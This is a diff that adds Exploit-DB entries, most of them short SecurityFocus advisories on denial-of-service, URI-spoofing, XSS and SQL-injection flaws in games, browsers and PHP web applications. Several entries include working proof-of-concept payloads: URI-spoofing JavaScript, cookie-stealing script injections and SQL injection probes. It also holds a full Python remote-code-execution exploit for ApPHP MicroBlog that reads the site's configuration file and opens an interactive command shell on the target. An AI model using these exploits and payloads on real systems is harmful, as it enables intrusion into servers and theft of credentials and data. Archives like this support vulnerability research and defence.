+This issue affects World in Conflict 1.0.1.1 and prior versions. 
+
+http://www.exploit-db.com/sploits/33099.zip

platforms/multiple/dos/33100.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/35762/info
+
+S.T.A.L.K.E.R. Clear Sky is prone to a remote denial-of-service vulnerability because the software fails to handle exceptional conditions when processing user nicknames.
+
+Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users.
+
+The issue affects S.T.A.L.K.E.R. Clear Sky 1.5.10 (1.0010) and prior versions.
+
+NOTE: This issue may be related to the issue described in BID 29723 (S.T.A.L.K.E.R. Remote Denial of Service Vulnerability). We will update this BID if more information emerges. 
+
+http://www.exploit-db.com/sploits/33100.zip

platforms/multiple/dos/33104.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/35806/info
+
+Star Wars Battlefront II is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions.
+
+An attacker could exploit this issue to crash the affected application, denying service to legitimate users.
+Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed.
+
+This issue affects Star Wars Battlefront II 1.1 and prior versions. 
+
+http://www.exploit-db.com/sploits/33104.zip

platforms/multiple/dos/33105.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/35807/info
+
+TrackMania is prone to multiple vulnerabilities.
+
+Successful exploits may allow attackers to execute arbitrary code with the privileges of a user running the software or cause denial-of-service conditions.
+
+This issue affects the following:
+
+TrackMania Nations Forever 2.11.11
+TrackMania United Forever 2.11.11 
+
+http://www.exploit-db.com/sploits/33105.zip

platforms/multiple/dos/33133.txt

@@ -0,0 +1,65 @@
+source: http://www.securityfocus.com/bid/35902/info
+
+
+Adobe Flash Player and Adobe AIR are prone to a heap-based buffer-overflow vulnerability.
+
+Attackers can exploit this issue to execute arbitrary code in the context of the application. Failed attacks may cause a denial-of-service condition.
+
+This issue was previously covered in BID 35890 (Adobe Flash Player and AIR Multiple Security Vulnerabilities) but has been given its own record to better document it.
+
+UPDATE (September 4, 2009): Mac OS X 10.6 reportedly ships with Flash Player 10.0.23.1, which will overwrite any installed version of Flash Player when Mac OS X is being installed.
+
+This issue affects versions *prior to* the following:
+
+Flash Player 10.0.32.18
+AIR 1.5.2
+
+Request:
+http://localhost:8080/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/FlashTest.htm
+
+Html source of FlashTest.htm:
+<html>
+    <body>
+        <br />----- <br />
+        <script>
+            var movieName = &#039;&#039;;
+            var flash = &#039;&#039;;
+           
+            function getMovieName()
+            {
+                movieName = &#039;a.swf?<overflowed>&#039;;
+            }
+           
+            function printFlash()
+            {
+                               
+                flash += &#039;<OBJECT &#039;;
+                flash += &#039;ID="something"&#039;;
+                flash += &#039;classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" &#039;;
+                flash += &#039;codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0"&#039;;
+                flash += &#039;WIDTH="70"&#039;;
+                flash += &#039;HEIGHT="90"&#039;;
+                flash += &#039;>&#039;;
+                flash += &#039;<PARAM &#039;;
+                flash += &#039;  NAME="movie"&#039;;
+                flash += &#039;  VALUE="&#039; + movieName + &#039;"&#039;;
+                flash += &#039;</OBJECT>&#039;;
+            }
+            getMovieName();
+            printFlash();
+            document.write(flash);
+        </script>
+        <br />----- <br />
+    </body>
+</html>
+
+
+Apache config:
+Alias /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa "C:/Inetpub/wwwroot/"
+
+<Directory "C:/Inetpub/wwwroot/">
+    AllowOverride None
+    Options All
+    Order allow,deny
+    Allow from all
+</Directory>

platforms/multiple/remote/33067.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/35595/info
+
+Winds3D Viewer is prone to a vulnerability that can allow malicious files to be downloaded an executed within the context of the affected browser that uses the plugin.
+
+Successfully exploiting this issue will allow attackers to compromise the affected application that uses the plugin.
+
+Winds3D Viewer 3.5.0.0 and 3.5.0.5 are vulnerable; other versions may also be affected. 
+
+http://www.exploit-db.com/sploits/33067.usr

platforms/multiple/remote/33084.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/35684/info
+
+Oracle Database is prone to a remote vulnerability in Network Foundation.
+
+The vulnerability can be exploited over the 'Oracle Net' protocol. An attacker doesn't require privileges to exploit this vulnerability.
+
+The following supported versions are affected:
+
+9.2.0.8
+9.2.0.8DV
+10.1.0.5
+10.2.0.4
+11.1.0.7 
+
+http://www.exploit-db.com/sploits/33084.zip

platforms/multiple/remote/33118.html

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/35829/info
+
+Apple Safari is affected by a URI-spoofing vulnerability.
+
+An attacker may leverage this issue by inserting arbitrary content to spoof a URI presented to an unsuspecting user. This may lead to a false sense of trust because the victim may be presented with a URI of a seemingly trusted site while interacting with the attacker's malicious site.
+
+Safari 4.0.1 is affected; other versions may also be vulnerable.
+
+This issue is similar to the vulnerability discussed in BID 35803 (Mozilla Firefox Error Page Address Bar URI Spoofing Vulnerability). 
+
+</script> <center> <h1>Firefox spoofing</h1> </center> <p> <a href="javascript:spoof()">test!</a> <p> <script> function spoof() { a = window.open("http://www.example.com%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20,") a.document.write("<H1>FAKE PAGE<\h1>") a.document.write("<title>test</title>") a.stop (); } </script> <br> Juan Pablo Lopez Yacubian 

platforms/multiple/remote/33123.html

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/35839/info
+
+Google Chrome is affected by a URI-spoofing vulnerability.
+
+An attacker may leverage this issue by inserting arbitrary content to spoof a URI presented to an unsuspecting user. This may lead to a false sense of trust because the victim may be presented with a URI of a seemingly trusted site while interacting with the attacker's malicious site.
+
+Chrome 2.0.172.37 is vulnerable; other versions may also be affected.
+
+This issue is similar to the vulnerabilities discussed in BID 35803 (Mozilla Firefox Error Page Address Bar URI Spoofing Vulnerability) and BID 35829 (Apple Safari Error Page Address Bar URI Spoofing Vulnerability). 
+
+<center> <h1>Chrome about:blank Spoof</h1> </center> This vulnerability is based on http://www.securityfocus.com/bid/35829/ and http://www.securityfocus.com/bid/35803 by Juan Pablo Lopez Yacubian and Michael Wood. <p> <a href='javascript:spoof()'><<h2>test Spoof !!</h2></a> <p> <script> function spoof() { a = window.open('http://www.example.com%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20,') a.document.write('<H1>FAKE PAGE<\h1>') a.document.write('<title>test</title>') a.stop (); } </script> 

platforms/multiple/remote/33124.txt

@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/35841/info
+
+Google Chrome is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to execute arbitrary script code in the context of the user running the application and to steal cookie-based authentication credentials and other sensitive data that may aid in further attacks.
+
+Chrome 2.0.172.37 is vulnerable; other versions may also be affected. 
+
+chrome://history/#q=%22%3E%3Cmarquee%3E%3Ch1%3Ebikolinux%3C%2Fh1%3E%3C%2Fmarquee%3E
+
+view-source:chrome://history/#q="><marquee><h1>bikolinux</h1></marquee>
+
+chrome://history/#q=%22&#039;%3E%3Ciframe%20src%3D%22http%3A%2F%2www.example.com%22%20height%3D%221024%22%20width%3D%22800%22
+%3E%3C%2Fiframe%3E
+
+chrome://history/#q=%22&#039;%3E%3Ciframe%20src%3D%22http%3A%2F%2www.example.com%22%20height%3D%221024%22%20width%3D%22800%22

platforms/php/webapps/33070.py

@@ -0,0 +1,132 @@
+#!/usr/bin/python
+import random
+import hashlib
+import urllib
+from base64 import b64encode as b64
+import sys
+import re
+
+# Exploit Title: Python exploit for ApPHP MicroBlog 1.0.1 (Free Version) - RCE
+# Exploit Author: LOTFREE
+# Version: ApPHP MicroBlog 1.0.1 (Free Version)
+# EDB-ID: 33030
+
+print "  -= LOTFREE exploit for ApPHP MicroBlog 1.0.1 (Free Version) =-"
+print "original exploit by Jiko : http://www.exploit-db.com/exploits/33030/"
+
+if len(sys.argv) < 2:
+    print "Usage: python {0} http://target/blog/index.php".format(sys.argv[0])
+    sys.exit()
+
+debug = False
+CHECK_FMT = "{0}?{1});echo(base64_decode('{2}')=/"
+INFO_FMT = "{0}?{1});echo(base64_decode('{2}'));phpinfo();echo(base64_decode('{3}')=/"
+# to read include/base.inc.php
+CONFIG_FMT = "{0}?{1});echo(base64_decode('{2}'));readfile(base64_decode('aW5jbHVkZS9iYXNlLmluYy5waHA%3D'));echo(base64_decode('{3}')=/"
+EXEC_FMT = "{0}?{1});echo(base64_decode('{2}'));{3}(base64_decode('{4}'));echo(base64_decode('{5}')=/"
+index_url = sys.argv[1]
+
+char = chr(random.randint(97,122))
+start_mark = hashlib.md5(str(random.random())).hexdigest()[:15]
+end_mark = hashlib.md5(str(random.random())).hexdigest()[:15]
+
+print "[*] Testing for vulnerability..."
+random_mark = hashlib.md5(str(random.random())).hexdigest()[:15]
+url = CHECK_FMT.format(index_url, char, b64(random_mark))
+if debug:
+    print url
+r = urllib.urlopen(url)
+if not random_mark in r.read():
+    print "[-] Website is not vulnerable :'("
+    sys.exit()
+
+print "[+] Website is vulnerable"
+print
+
+def extract_between(data):
+    global start_mark
+    global end_mark
+
+    if start_mark not in data or end_mark not in data:
+        print "[-] Oops. Something went wrong :("
+        return ""
+
+    return data.split(start_mark, 1)[1].split(end_mark, 1)[0]
+
+print "[*] Fecthing phpinfo"
+url = INFO_FMT.format(index_url, char, b64(start_mark), b64(end_mark))
+if debug:
+    print url
+r = urllib.urlopen(url)
+output = extract_between(r.read())
+output = re.compile(r'<[^<]*?/?>').sub(' ', output)
+
+interesting_values = [
+    "PHP Version",
+    "System",
+    "Loaded Configuration File",
+    "Apache Version",
+    "Server Root",
+    "DOCUMENT_ROOT",
+    "allow_url_",
+    "disable_functions",
+    "open_basedir",
+    "safe_mode",
+    "User/Group"]
+
+for line in output.split("\n"):
+    line = line.strip()
+    if line:
+        for value in interesting_values:
+            if line.startswith(value):
+                print "\t" + line
+print
+
+print "[*] Fetching include/base.inc.php"
+url = CONFIG_FMT.format(index_url, char, b64(start_mark), b64(end_mark))
+if debug:
+    print url
+r = urllib.urlopen(url)
+output = extract_between(r.read())
+print output
+print
+
+exec_functions = ["system", "passthru", "exec", "shell_exec"]
+valid_exec = None
+print "[*] Testing remote execution"
+for func in exec_functions:
+    # trying to exec "echo LOTFREE"
+    url = EXEC_FMT.format(index_url, char, b64(start_mark), func, "ZWNobyBMT1RGUkVF", b64(end_mark))
+    if debug:
+        print url
+    r = urllib.urlopen(url)
+    output = extract_between(r.read())
+    if "LOTFREE" in output:
+        valid_exec = func
+        break
+
+if valid_exec is None:
+    print "[-] Did not manage to execute commands :("
+    sys.exit()
+
+print "[+] Remote exec is working with {0}() :)".format(valid_exec)
+print "Submit your commands, type exit to quit"
+while True:
+    try:
+        cmd = raw_input("> ").strip()
+    except EOFError:
+        print
+        break
+    if cmd == "exit":
+        print
+        break
+    if (len(cmd) % 3) > 0:
+        padding = " " * (3 - len(cmd) % 3)
+        cmd = cmd + padding
+    url = EXEC_FMT.format(index_url, char, b64(start_mark), func, b64(cmd), b64(end_mark))
+    if debug:
+        print url
+    r = urllib.urlopen(url)
+    output = extract_between(r.read())
+    print output
+    print

platforms/php/webapps/33115.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/35816/info
+
+AlmondSoft Almond Classifieds is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+AlmondSoft Almond Classifieds Enterprise, Pro, and WAP Editions are vulnerable. 
+
+http://www.example.com/clnt/index.php?ct=manw_repl&md=add_form&replid=11438   and 1=1 <= TRUE
+http://www.example.com/clnt/index.php?ct=manw_repl&md=add_form&replid=11438   and 1=2 <= FALSE
+http://www.example.com/clnt/index.php?ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5=> TRUE
+http://www.example.com/clnt/index.php?ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5=> FALSE

platforms/php/webapps/33116.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/35816/info
+ 
+AlmondSoft Almond Classifieds is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+AlmondSoft Almond Classifieds Enterprise, Pro, and WAP Editions are vulnerable. 
+
+http://www.example.com/wap/index.php?md=browse&ct=manw&city=Akron%20OH&page=1<script>alert(317158806252)</script>
+http://www.example.com/clnt/index.php?ct=evntcl&md=browse&mds=search&adsordtp=vote&city="><script>alert(document.cookie);</script>&page=2

platforms/php/webapps/33117.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/35816/info
+  
+AlmondSoft Almond Classifieds is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+  
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+  
+AlmondSoft Almond Classifieds Enterprise, Pro, and WAP Editions are vulnerable. 
+
+http://www.example.com/pro/gmap.php?addr="><script>alert(document.cookie);</script>

platforms/php/webapps/33119.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/35834/info
+
+PG eTraining is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/courses_login.php?cat_id=[XSS]

platforms/php/webapps/33120.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/35834/info
+ 
+PG eTraining is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+http://www.example.com/news_read.php?id=[XSS]

platforms/php/webapps/33121.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/35834/info
+  
+PG eTraining is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+  
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+  
+http://www.example.com/lessons_login.php?btn=start&cur=[XSS]
+http://www.example.com/lessons_login.php?id=[XSS] 

platforms/php/webapps/33122.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/35836/info
+
+The 'com_user' component for Joomla! is prone to a remote URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
+
+A successful exploit may aid in phishing attacks. 
+
+http://www.example.com/path/index.php?option=com_user&lang=fr&view=[SITE] 

platforms/php/webapps/33125.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/35849/info
+
+The Permis 'com_groups' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Permis 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?option=com_groups&task=list&id=25 and substring(@@version,1,1)=4
+http://www.example.com/index.php?option=com_groups&task=list&id=25 and substring(@@version,1,1)=5 

platforms/php/webapps/33126.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/35856/info
+
+Matterdaddy Market is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+The issue affects Matterdaddy Market 1.2, 1.1, 1.051, 1.04, and 1.03; other versions may also be affected. 
+
+http://www.example.com/index.php?q="><script>alert(document.cookie);</script> 

platforms/php/webapps/33127.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/35871/info
+
+The Site Builder module for Miniweb is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Site Builder module for Miniweb 2.0 is affected. 
+
+http://www.example.com/sitebuilder/index.php/"><script>alert(document.cookie);</script>
+http://www.example.com/sitebuilder/index.php?sitebuilder_id="><script>alert(document.cookie);</script> 

platforms/php/webapps/33130.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/35893/info
+
+NTSOFT BBS E-Market Professional is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+The following example URI is available:
+
+http://www.example.com/community/index.php?pageurl=board&mode=view&b_no=Evil-code5014&bt_code=Evil-code&page=Evil-code 

platforms/php/webapps/33131.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/35895/info
+
+XOOPS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+XOOPS 2.3.3 is vulnerable; other versions may be affected as well. 
+
+http://www.example.com/xoops-2.3.3/htdocs/modules/pm/viewpmsg.php?op='"><script>alert('vulnerable')</script>
+http://www.example.com/xoops-2.3.3/htdocs/modules/profile/user.php?"><script>alert('vulnerable')</script> 

platforms/php/webapps/33132.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/35896/info
+
+Softbiz Dating Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/cat_products.php?cid=[SQL INJ]